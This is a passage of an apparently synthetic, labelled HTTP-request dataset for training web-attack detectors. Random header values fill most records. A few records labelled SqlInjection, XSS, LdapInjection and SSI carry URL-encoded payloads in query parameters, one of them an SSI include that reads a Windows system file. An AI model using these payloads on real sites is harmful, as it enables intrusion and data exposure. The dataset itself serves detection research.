Proxy-Authorization: Digest realm
Authorization: uojiie un3oo8=terwwihi
Range: 1287-,6-111,8884-
Referer: http://iyrp0t.net/EhKnAe/he63qbpo/t32te/uias.swf
TE: chunked,trailers,deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 9.0; Zt-aw; rv:6.0.0) Gecko/29388284
UA-CPU: 68000
UA-Disp: 967,053,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6546x3443
Via: FTP/2.7 www.EhwAepi.png, FTP/2.4 www.58ckU.jpeg:25218
Transfer-Encoding: compress
Upgrade: vfUsoh/7.3
Warning: 610 www.xmte.htm:73 "sebnthrcdtgboft" 
X-Forwarded-For: 188.77.210.37
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26956
Start - Id: 42602
class: SqlInjection
GET /-vkssiXe57FIcmdS/djlaEgeoOct6U74/elM9ZhDJcjz9_LzFl/0b7UK-b-.Ogb1_h8Khg/ejLdJaC22/VKPp9wlGr2@Q/XC/hTOhWmgZOnomQl/o6nyChaHS.h/FkorpImI_.aspx?urreter=46%5DRfihavingteao&aitn=lroacceptxlpaEaotbneah&gemUtutnEnygznc=anYo&eiie=88639144&veblhshrcbg=nt%28&uen=linkntohit+4&a7=%27++UNION+++++++++++ALL+++++++SELECT++++2eequeocEm+++FROM++++aN++WHERE+++++%27%27+++%3D+++%27&icltntticrlrton=8843292&ir=bgsoundeAcr&yphovWb=fjelM HTTP/1.1
Host: www.eeArsvgr7i.ch
Connection: close
Accept: audio/*, audio/x-wav;q=0.0
Accept-Charset: x-mac-hebrew;q=0.7, koi8-r;q=0.0, ks_c_5601-1987
Accept-Encoding: *;q=0.7
Accept-Language: 4ar-astaT
Cache-Control: no-store
Client-ip: 8.13.145.39
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="813"
Date: Mon, 29 Mar 10 09:32:23 GMT
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: ioed@oROvlcftKp.biz
If-Modified-Since: Sun, 20 Dec 09 18:02:03 CET
If-Unmodified-Since: Thu, 11 Oct 07 05:27:32 CET
If-Match: *
If-None-Match: "fUwV2w5ys0nv@yaGB"
If-Range: *
Max-Forwards: 9913
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM YTd1cm9jYW5penRTaGxzYWhobG9vaXRyODRnbXRpaUxTZEVTcA==
Referer: http://www.woEmyt37.com/aNtUt0/dfeoepgh.mdb
TE: trailers,trailers,trailers
User-Agent: Mozilla/9.6 (Windows; U; Win98 2.5; to-q0; rv:4.6.8) Gecko/94905906
UA-CPU: Sparc
UA-Disp: 4133,8176,16
UA-OS: Win98
UA-Pixels: 4720x346
Via: 7.0 81.242.161.243
Transfer-Encoding: deflate
Warning: 159 192.87.208.139 "nshFuefcm8" 
X-Forwarded-For: 35.161.132.69
----: -----------

null

End - Id: 42602
Start - Id: 33570
class: Valid
POST /oPVtIDT7/ooRtRfweg4anna/atiRbhaaaIthd/cCV5aKKVBD.L@Ry/a25er4eh0t/Zj7b3gdrmetaFZ-/ehtlocN7tMn/cahdle/4and-VselectRU@Zevalz3oB/77A18msk7.htm? HTTP/1.0
Content-Length: 179
Content-Language: uam,mRrmOe,ssIgnds
Content-Encoding: deflate
Content-Location: /hifetsic/nzspe/qnrc9.mpg
Content-MD5: bE5wZTNhYWlxbmVuaWxtbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Feb 10 14:07:31 GMT
Last-Modified: Fri, 24 Aug 07 08:19:04 CET
Host: www.odThoslv.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip;q=0.7, compress;q=0.2, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.250.45.10
Cookie: aSirogo5b=sO6u@yiKb2kR;DO0dBTwp=pzT
Cookie2: $Version="0"
Date: Wed, 30 Jul 08 03:58:16 GMT
ETag: "uDsf.2.VL80DRGjr9J"
Expect: sqej2
From: nndz@n7ls.fr
If-Modified-Since: Sun, 07 Nov 04 19:40:04 UTC
If-Unmodified-Since: Mon, 25 Jun 07 15:49:58 CET
If-Match: "@cNIXAXyqgQK6uPK"
If-None-Match: "OcKCO_XZC3.-Ss0rD-ar"
If-Range: "v0fo0nWPW.Ea8J6Fi"
Max-Forwards: 4976
MIME-Version: 7.8
Pragma: bcoor='er'
Proxy-Authorization: 04aage ra4ttt=w2Glsaa
Authorization: Digest uri=http://runtjske.org/ette/doan.mdb
Range: -65580,016-
Referer: /e1sbdu/edOszdo/rtdrtib/2pKa.tar.gz
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: ibixneauavg
UA-CPU: PowerPC
UA-Disp: 4987,665,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.7 www.cesd.gif, 7.3 www.adtOtxc.jpg, 8.7 www.eete.gif
Transfer-Encoding: gzip
Upgrade: seaotb/4.9, Cnb/7.8, ikhrhe/2.2
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 2.111.244.26
X-Serial-Number: 634432406284219
----: -------------
~~~~~: ~~~~~~~~~~~

uClSvPp7tA=n&tb=tqkRa&XTLiLT_Qn6AP=iej&1Qe5YCyIUdrop=e4vee5NUolnHwse1&5tpgodbueiFttft=560104&jesoS=s7e9e&nrusG7=2muhlauei5mhcc&u9so6weize=t-q&bmifxa=pc6rrac3&ylaingzgroup byXdF=86

End - Id: 33570
Start - Id: 17733
class: Valid
GET /eahb9M/e-B/ttonxuhxVhsbtHd/EE/er2iersrideyogf8na/iiX0wVV@oUAvgW/p0yZFafw__V/hluc/t_jkDqYEjS/ssCdedqW5ttstg.exe?onEoti=ea&ieexoHo=s6ry&hor=Ccqsneooaseapne&eelrPermaedbeiw=nfev%3Cspuc25mv&oun=2175&an=acani&@u1B-=+7%3EO8tM%7Covedmt&whrg=i%4088av&9Xr-6P-perlnullP=o%5DdtTorrstdin&Rossrdsednsoa=ludaeueiwi2isochn&emncoh=%5Cl%40ugum+mbacceptuegeEr&fhhoi6r=%3DodaeVHmsungljN&nee6ura=Dcecmqscd16&qenev6y=eoxs344imqe&ys=5 HTTP/1.0
Host: 252.228.209.60:563
Connection: ierys
Accept: text/xml, image/png;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.0, identity;q=0.1, deflate;q=0.7, deflate;q=0.1, compress;q=0.8
Accept-Language: eth-b, udeesaat-Mw3k, oee3t-endwCyu, t-aSej;q=0.3, hrt-geohie;q=0.2
Cache-Control: ue2im=zdhhrh
Client-ip: 198.3.110.231
Cookie: xsina=3;rcttwrSxsr=so45iDw_U
Cookie2: $Version="908"
Date: Wed, 10 Dec 08 09:40:29 UTC
ETag: "zDUyesiAWJry31tlb"
Expect: 100-continue
From: Neoofsos@ndyrsei.biz
If-Modified-Since: Sat, 07 Oct 06 12:39:56 GMT
If-Unmodified-Since: Mon, 20 Jun 05 20:23:20 GMT
If-Match: "208Q@WI5vaI-vfa"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.2
Pragma: dEen='dymr4'
Proxy-Authorization: zEte 4clo9ebe=enFNEn3b
Authorization: Basic Z3kxZE9vOmRtNW12YWU=
Range: -42
Referer: http://www.eetE.gov/ohtiFPe/nnbtd8l6.txt
TE: gzip;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 1.9; o6-fh; rv:8.1.1) Gecko/29157273
UA-CPU: PowerPC
UA-Disp: 2302,8459,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 582x198
Via: titj/7.7 www.srsolaee.gif
Transfer-Encoding: gzip
Upgrade: zhu/2.1, eAh/4.1
Warning: 725 124.182.181.17 "nnnetcsfa" 
X-Forwarded-For: 102.74.69.231
X-Serial-Number: 197606037
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 17733
Start - Id: 15743
class: Valid
GET /rckainrnyxosali/HOj.html?esoole=efQ8v&ol0tilceh=13253419&oHinan=szdivtgrIeltN&e1uhehrh=5422032&2schnfh=1148741&T4UtinsertechoWprocessing-instruction.XS=tbodyeue&ratr=%40o5%26%2Bs++pqt%25N7t&oehrn=1nph-qyheut-&v6Jlikeqxp_=845465&ewbhwsareberaii=%2Bwp-&sewnna6cEeje=o+dhr&ENnetcatA34=oVZi0BeS87W5&8c8l3npgourka=tzh+r&iogePntqa=58164016&zTcaTMeWga=cyvw7Yr-h17 HTTP/1.0
Host: www.coneiin.ch
Connection: hrulIlf
Accept: */*
Accept-Charset: windows-1253, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.117.237.163
Cookie: d0q3igc4er0ektp=obWVdd;aetti=rftpidaas=%LY ZahG\;5upasswdz7-vLMKX=0;e5Vaoapm=hQv_;gsyiCw8=mZYd1ZDVw2
Cookie2: $Version="5"
Date: Mon, 25 Oct 04 11:52:54 UTC
ETag: "y-BoSH_Qn.9YebnIUJ"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 28 Jun 08 10:16:23 CET
If-Unmodified-Since: Wed, 27 Jul 05 14:19:55 UTC
If-Match: "9-gxzkcpW_BbD40KUEyk"
If-None-Match: *
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 7785
MIME-Version: 5.8
Pragma: jwi=mge4Xs8
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: Digest algorithm=MD5-sess
Range: 8313-,-95
Referer: http://www.feto.be/tueyki/leedeaeG/86cesa/ufeseoUs.msf
TE: gzip;q=0.4,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: kRsmlLCqz http://www.ghWrs.de
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: debebm/9.7 www.taht.png, FTP/3.1 180.206.183.241:46
Transfer-Encoding: compress
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 187 39.158.215.98 "I6Fton" "Mon, 11 Aug 08 06:05:52 GMT"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15743
Start - Id: 47237
class: XSS
GET /xFcKeG_V9gw/Taccepts/t1n9KQP.zr8jQcO7@/h6Vol_i3B4/eg.dll?XWFQFpositionxbnay=ruvo+5+toast&rohyf=%3Cobject++++classid+++%3D+%22++clsid%3A...%22++++codebase%3D+%22+++javascript%3A+%5Balert+%28%27inemtTeaz%27%29%3B%5D++++%22%3E&raaeafps=51539054&BcbhttpstelnetX=ej6lfB&fvzsmenqFduhel=533196073&tcZobject@odocumentLtmp8sP=eBxTh%40Xtsy&AEchildzZ=titc%27&eamzhab=79231547&bqnbebtth2qpi=9a HTTP/1.0
Host: www.brtnnNo.be
Connection: close
Accept: application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: identity, compress;q=0.3, compress;q=0.6, deflate
Accept-Language: n8muoeul-ns3s8vs, etm-l;q=0.4, heil-vvEe2q, islm7rsw-dRhSgws4;q=0.2
Cache-Control: only-if-cached
Client-ip: 226.163.167.76
Cookie: r6u=4639566;j0YdzUHM70=3;ioe39=l;i1desrbrmu1o=yhNq =gnSm-t 3between;biGlHnt=t2:
Cookie2: $Version="633"
Date: Thu, 20 Aug 09 07:56:21 GMT
ETag: W/"IpFYpz7hjp_CCGyUyX6"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Fri, 13 Feb 04 07:08:20 CET
If-Unmodified-Since: Sun, 21 Oct 07 09:54:34 GMT
If-Match: *
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: Sun, 31 May 09 23:13:57 UTC
Max-Forwards: 8047
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic bWFjaTpEZ2hlTQ==
Authorization: Digest response="EEcbb23DA98D980EeFA9BF0A6f53F806"
Range: -040129,-2915,414879-
Referer: http://iciuwTaN.ch/rsthsus/ieoa/LstT/3zocd/tyt0.dll
TE: gzip;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 7.3; sl-or; rv:5.0.9) Gecko/93647202
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/7.8 149.51.45.48
Transfer-Encoding: aeetrt; R7efNRo=cgibh5eh
Upgrade: sos/0.3, 9e6etg/6.5, wc2/6.5, nsbd/1.7
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47237
Start - Id: 21568
class: Valid
GET /iilgoitczmj5ldii/heoseK/eqineJucqGKR7VbA/ukiE1ise5id/s.3BE3/Uinatnsgt/twdoekpooh/eZ1/iGe.sxVT/E8riurNte2hsanritees.aspx? HTTP/1.1
Host: www.4opchh.ch
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: p8e2httw-rO, nIl-a0;q=0.0, sdkPcd-seetferd
Cache-Control: no-cache
Client-ip: 113.45.187.36
Cookie: T57=439225;rlra=eOU.m79Ko;liutpos=~d qomt2input;x2u7vzbscohig=90683;imEi9hii=li76&mo
Cookie2: $Version="5"
Date: Tue, 14 Feb 06 13:55:21 UTC
ETag: W/"s@WI5ffCNTy5Y9K"
Expect: rSnfo
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Mon, 12 Jan 09 15:21:47 GMT
If-Unmodified-Since: Tue, 04 May 10 05:15:36 GMT
If-Match: "O7fclXPvCsNF0E8hzb5X"
If-None-Match: "-rmZJYSjtejiiMrq2"
If-Range: Tue, 08 Sep 09 12:20:19 GMT
Max-Forwards: 85
MIME-Version: 7.6
Pragma: a=vzori
Proxy-Authorization: Basic b3VkOUU6VEVhcGNhcHM=
Authorization: Basic YXNlbmE6aWQ2dHI=
Range: 2-80,017649-3707,66648-326
Referer: http://www.9pnw.org/O7m7arqo/q23c/5ottuy/sg3ee/0ma9yRx.jsp
TE: deflate,gzip,trailers
Trailer: If-Range
User-Agent: ceatssEns13uiseytstl
UA-CPU: x86
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0542x2765
Via: 2.0 113.128.22.58, omdihr/2.1 55.89.254.52:5611, FTP/9.8 106.161.175.15
Transfer-Encoding: identity
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 40.222.86.185
X-Serial-Number: 42015
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21568
Start - Id: 19277
class: Valid
GET /e9rausEcjyueem/4xoG8ogyS_/asnnMp/ca3dut.mdb?aetatdiaudonmh=024&fsIf9J7id7sf0p5=8%2F+7&ouAect=AnteHt4Fet&norn8ehiTPa37a=aireS-hretsiH%5C&imaartdo9m=gnph-k7oitwinntaas&nviaeueoj=vNIyn8&ureoosl=70&etouistg6olel0=64692&Ln_8oobjectxJchildQand=ob%3A+ne&tdrw0urom=ht%7Cgroup+byeo%2Bx&9kMYXv=nJiFgv HTTP/1.0
Host: www.rrnr.ch
Connection: yrsseS
Accept: application/*;q=0.6, audio/x-wav;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.0, windows-1251
Accept-Encoding: compress;q=0.4, deflate, gzip
Accept-Language: onsaOenn-hmEgi, ode-t, Wbtrsp-aty
Cache-Control: no-transform
Client-ip: 39.67.36.93
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="0"
Date: Mon, 27 Dec 04 09:37:22 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sat, 11 Mar 06 03:26:10 GMT
If-Unmodified-Since: Mon, 09 Feb 04 14:29:25 CET
If-Match: *
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: "8KQ9GMXz30WY@q9O6KFR"
Max-Forwards: 4
MIME-Version: 6.0
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: NTLM ZW1lb2FlZXVkbmNiYmFsZXR0aWxvdGRkcG1oY3RkbkFpYWZydA==
Range: 784688-250,21331-
Referer: http://qk91stt.biz/oa22Tx/anBddsla/g1nne/btTtheii/frnmate3.msf
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.9 (compatible; torA; Open BSD i386; eeowOfflt; lianxb)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3128x8633
Via: 5.1 224.5.147.122, 2.9 143.189.83.235
Transfer-Encoding: gzip
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 750079016802641903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19277
Start - Id: 38174
class: LdapInjection
GET /aAYNi276BmfVtUpuQw/tqwG8UpMdi_r019/Mt@Upsrm/oui/lahgvytjeawekB3.php4?owmievH=32742&bibryeccest5h=euRf&Lmb=999782&8d=xuolnm9s&o7id=esaua&9teiarao7eundir=vGm2%29%28%26%28objectClass++++%3D++Izvs*%29&eti9osRtre=nQYk-&saeYofqt3amnism=su1aoIrdom&aneut8nhl=e&Shmh5utDrjdt=deE%25m HTTP/1.0
Host: 122.73.226.210
Connection: Gse1u
Accept: video/quicktime;q=0.8, text/*;q=0.9
Accept-Charset: hz-gb-2312;q=0.9, macintosh, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: g-hSipiC, GrAeag3-J;q=0.6, t4j-opnFeiad;q=0.2
Cache-Control: max-age=959
Client-ip: 170.20.121.37
Cookie: e6wtesdsc=aNvBe_cNkq;imgbody.Eq=a2ow93airur9e1;fhnevit=Mi;Daccess_logEA=xs@sOwinnt(
Cookie2: $Version="352"
Date: Sat, 26 Jan 08 14:32:16 CET
ETag: W/"vvFa0fGEYN0n5p.x"
Expect: akppg
From: dipgxt@5huagprh.de
If-Modified-Since: Mon, 27 Apr 09 20:48:10 UTC
If-Unmodified-Since: Mon, 15 Mar 10 03:45:53 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Mar 05 14:38:31 GMT
Max-Forwards: 0839
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWFjdGNpcHQ3ZGM5U2hjc2Vzc24xdEllRWN0c3VramVIdA==
Authorization: Digest opaque="apo2Yo"
Range: -58269,-622
Referer: http://www.fetac2.org/enlrdrao.jsp
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: chitwaa
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5047
Via: 0.7 www.Bzmztzs4.tiff, gow/4.4 252.47.72.194
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38174
Start - Id: 40533
class: SSI
GET /aarm0/sE8ednha/nDx0dSgjCL/zrR4/bxStHEi1/nh6Oom7l5o1rsf/hs7Coeyh7g2go.jpeg?rec=t%7Cnsdnw3perlnap&6S=tienuixLeIt&0deudnNe=l_fYiTKM&MAvobody8U=0kdrgwto2co&7oeyoFsdt=+gwp-&r0fkaf=io&0Ntnoeg8haeAxq=tBEBS-J2&bzp9puU1UC=kn&aUEp@z=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&lilNh2snrsse=Ae4ew&iac84ml58o9It=t3jX4&lOearlnsg2e=dEE HTTP/1.0
Host: www.n2rcTa.gov
Connection: pcLa2lsa
Accept: text/*;q=0.0, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: hsiamig-n;q=0.6, avhrhyE-scT, r6en-nodde1el
Cache-Control: only-if-cached
Client-ip: 233.63.57.74
Cookie: o7iS=iomah7otmttEjuTe;TEosgcox=eta1sdediliYbiahp
Cookie2: $Version="326"
Date: Thu, 30 Mar 06 13:02:03 GMT
ETag: "AfcdCSnakAcyeEBs"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Sat, 28 Mar 09 23:45:20 CET
If-Unmodified-Since: Thu, 06 Aug 09 24:01:04 GMT
If-Match: "qV-cYVjAGKbV-yPpeMju"
If-None-Match: *
If-Range: Mon, 17 Aug 09 05:55:44 CET
Max-Forwards: 77
MIME-Version: 7.8
Pragma: iar3d4st='Nkioue'
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Digest qop=auth-int
Range: -52,238-2637
Referer: http://www.hhlrlR.st/srotsny/ooiard.php
TE: trailers
Trailer: Referer
User-Agent: botq/1.5
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: n0pgt/1.1 84.65.243.160, 2.8 62.233.199.244, 0.7 169.81.218.30
Transfer-Encoding: deflate
Upgrade: ttRtgh/5.0, upo/8.3, 1a4/1.5, lamere/3.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40533
Start - Id: 10841
class: Valid
GET /mEC/oQi/srhjeisnhh3a7edti5p/f_Jdw7asDMo0tzE.msf?ht=758&let=neeSb%2Fuo7&a7mu=177426407&ytia=0057187524&apo=dsaL4&hss6of=00&9crUNpufsotebs=6&2iefi8ihH=379819427&HXthlocationgorftpwep=n++b&e85oEqdHeud=1560476833&ea=amteFjRo&ongtmhsR=eml&sgTuititichNi9s=%27%5CQ&is3ouo95gh7i=3emi&PFJ0n=rbQc2QHmJ-f HTTP/1.0
Host: www.Neln.com
Connection: close
Accept: video/quicktime, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: nt-u8tRad3e
Cache-Control: only-if-cached
Client-ip: 217.184.252.45
Cookie: otb=ufiswrgt;9cXy.dIprocessing-instructionDQZ3=haeGaNT;8tjozdpnt6nidi=1ahmxArlZ7;OvJVxGnCQTU=2152191;NEeaR4zchIaoot=egirhsTnhe
Cookie2: $Version="84"
Date: Tue, 21 Mar 06 23:33:31 GMT
ETag: W/"mG2gN83kMy4-br.3f@Ol"
Expect: sihdulZC
From: iaea@legOhh.be
If-Modified-Since: Sun, 18 Jan 09 11:09:17 CET
If-Unmodified-Since: Sat, 19 Jun 04 04:43:51 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Sep 09 15:48:00 GMT
Max-Forwards: 1
MIME-Version: 8.9
Pragma: otr=nemxS
Proxy-Authorization: e4Gn esD1thd=Vlld
Authorization: lsaad a5Ig5=B0ihdnn
Range: 91-,-561,41493-0546
Referer: http://hhtMnn.de/iA094wee/md2n02A/eiath8u.msf
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: sDzH8i http://www.mdErwnie.st
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: 8.5 www.7yt6cxgn.shtml, HTTP/8.3 www.goomlqau.js
Transfer-Encoding: deflate
Upgrade: clli/2.2, tee/6.7, b4acRj/4.6, raese/1.9
Warning: 830 www.uepsaus.jpg "eeeueouSnw2un" "Tue, 19 Jun 07 17:29:06 UTC"
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 340324850745307
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10841
Start - Id: 2200
class: Valid
GET /i1aptdveiHu8rrndh/6roABoghUt/jwntk/mtatwmcp/XGQQHduO/pbguiydeubhysnHe/dEsn/hWc0j1YKv/nF-yu6uAQdy5/s5gsaett/ae/placzoaasep.tiff?vzef9aim=95159&tlefiAloedae=havu6cYYs4&e2=34419&ylaIsrzls3eayt=aeieo3suehiyto7t0S&fdt7b6te=ntlvartoptnt+vSi+sT&1YH3Swindow.openFvtf=8W4&LK5m=wH%7CeeadhmiT%27se6%3D&etr=opHZXlM_&Yh=6%5Die%3Dea1N&dqzahbsiorxut=ebrjt&P5IE=Rmidtsp7hhstOns&itl8a=04 HTTP/1.0
Host: 234.64.2.175
Connection: close
Accept: */*
Accept-Charset: utf-8, iso-8859-8-i;q=0.4, iso-10646-ucs-2;q=0.1, x-mac-japanese, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 26.112.134.215
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="0"
Date: Sun, 04 Apr 04 14:05:17 GMT
ETag: W/"LVkyU2uIMGdKMR918Ir0"
Expect: hnss
From: mennl@hhaoaw.st
If-Modified-Since: Mon, 16 Oct 06 23:58:27 GMT
If-Unmodified-Since: Fri, 23 Mar 07 19:30:50 UTC
If-Match: "wJHEcvi@@pW7ded.-mhe"
If-None-Match: "pCtlFM0X4F0Tpf@HQV8@"
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 686
MIME-Version: 3.0
Pragma: neh=ir2eitc
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Basic dHNtY286YnBvN3RlYQ==
Range: 646-76073,721917-1
Referer: http://doeooen.biz/l3otstl/reOo3.mp3
TE: gzip;q=0.2,chunked;q=0.1
Trailer: If-None-Match
User-Agent: nasiaXddmg/7.5.1.2
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 318x353
Via: 2.8 www.eme9Eoel.css
Transfer-Encoding: mecpp
Upgrade: ql7Ei/0.0
Warning: 143 21.200.146.83 "81ors1eyRh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 26606464842114964
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2200
Start - Id: 23945
class: Valid
GET /vWueVz36J-jQ/mTC.AeuimggJ8homel_/ntps/rh/ree6Det7eo2roewqhj/ufVnriqsBof6Ts/rhR-G@Nh_eE3Mx5P/oERQH-8A5.js?dHurefePIosp0e=ttdM%24L%24r%5D%24rii%3Faczate&diotenEnkte=9 HTTP/1.1
Host: www.6acTyao.de:80
Connection: keep-alive
Accept: text/plain, audio/*
Accept-Charset: iso-10646-ucs-2, iso-8859-7;q=0.9, windows-874;q=0.2
Accept-Encoding: gzip, deflate, identity;q=0.7
Accept-Language: ha6-myume5ed, k-Liwy7la, ssoeno-rtRcoeuZ;q=0.8, tlsl-uhall;q=0.3
Cache-Control: no-store
Client-ip: 237.51.196.149
Cookie: fEFrnlsn=wdzpg;Dfu=14617684
Cookie2: $Version="843"
Date: Sat, 19 Dec 09 24:58:10 GMT
ETag: W/"vLjjb2CDSIkumpD"
Expect: 100-continue
From: irliyiyI@8ciiyp.be
If-Modified-Since: Mon, 28 Apr 08 07:21:08 GMT
If-Unmodified-Since: Fri, 19 Aug 05 18:38:07 CET
If-Match: "-iPs0KQwYGxUvoD3UP"
If-None-Match: "Zqc1nGUHW8jbIJynZjB"
If-Range: Sun, 28 Mar 10 21:40:28 UTC
Max-Forwards: 39
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=C211e566
Authorization: eFs1 2eesahdr=0Enit
Range: 074-7647,9-,-3
Referer: http://dOoh.org/trieyi/rsadtOlh/noqHW1nd/n3rbsi/czgpmg.jpg
TE: deflate
Trailer: Accept-Encoding
User-Agent: Eehw (oRNK@yO; 8Pe9E94cL@; o6UhrNn9; mzntXhiycv)
UA-CPU: StrongARM
UA-Disp: 7033,058,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: atcs/4.9 www.pAaLm7i.css, HTTP/2.5 44.116.253.86
Transfer-Encoding: gzip
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23945
Start - Id: 24165
class: Valid
